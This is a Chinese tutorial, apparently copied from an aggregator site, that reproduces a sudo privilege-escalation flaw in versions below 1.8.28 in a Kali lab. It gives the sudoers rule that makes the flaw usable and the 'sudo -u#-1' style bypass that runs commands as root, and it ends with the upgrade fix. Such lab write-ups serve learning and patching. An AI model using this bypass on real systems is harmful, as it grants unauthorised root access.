Sudo提权漏洞复现

Sudo提权漏洞复现,第1张

概述Sudo是linux的系统命令,让普通账号以root方式执行命令   正常来说如果普通用户需要用sudo,需要修改配置文件/etc/sudoers,将sudo使用权赋予该用户   而这个漏洞使得普通用户也可以绕过安全策略,执行敏感命令 漏洞影响的版本是<1.8.28   实验环境:kali   漏洞复现过程   1、 查看sudo版本   Sudo –V           2、 修改配置文件:v

Sudolinux的系统命令,让普通账号以root方式执行命令

 

正常来说如果普通用户需要用sudo,需要修改配置文件/etc/sudoers,sudo使用权赋予该用户

 

而这个漏洞使得普通用户也可以绕过安全策略,执行敏感命令

漏洞影响的版本是<1.8.28

 

实验环境:kali

 

漏洞复现过程

 

1、 查看sudo版本

 

Sudo –V

 

 

 

 

 

2、 修改配置文件:vim/etc/sudoers root(ALL:ALL)ALL添加一行

 

Test ALL=(ALL,!root)ALL

 

 

第一个ALL表示用户可以在任意地方使用sudo

第二个(ALL,!root)表示命令可以被除了root以外的任意用户执行

最后一个ALL表示允许被执行

整体代码:test用户可以使用sudo,是除了root以外的任意用户去执行

 

 

 

注意:需要创建test用户:useradd  test   passwd test

 

 

 

 

 

 

 

3、 切换到test用户

 

Su test

 

然后sudo ID(查看rootID

 

 

 

发现没有权限执行

 

4、 使用以下方法去执行想要的执行的命令

 

Sudo –u#数字 命令

 

其中数字范围:-1~4294967295,命令是系统命令

 

数字-1或者最大代表root用户

 

修复方法:更新sudo版本>=1.8.28

 

该漏洞比较鸡肋,需要管理员修改配置文件

总结

以上是内存溢出为你收集整理的Sudo提权漏洞复现全部内容,希望文章能够帮你解决Sudo提权漏洞复现所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/yw/1022622.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-23
下一篇 2022-05-23

发表评论

登录后才能评论

评论列表(0条)

保存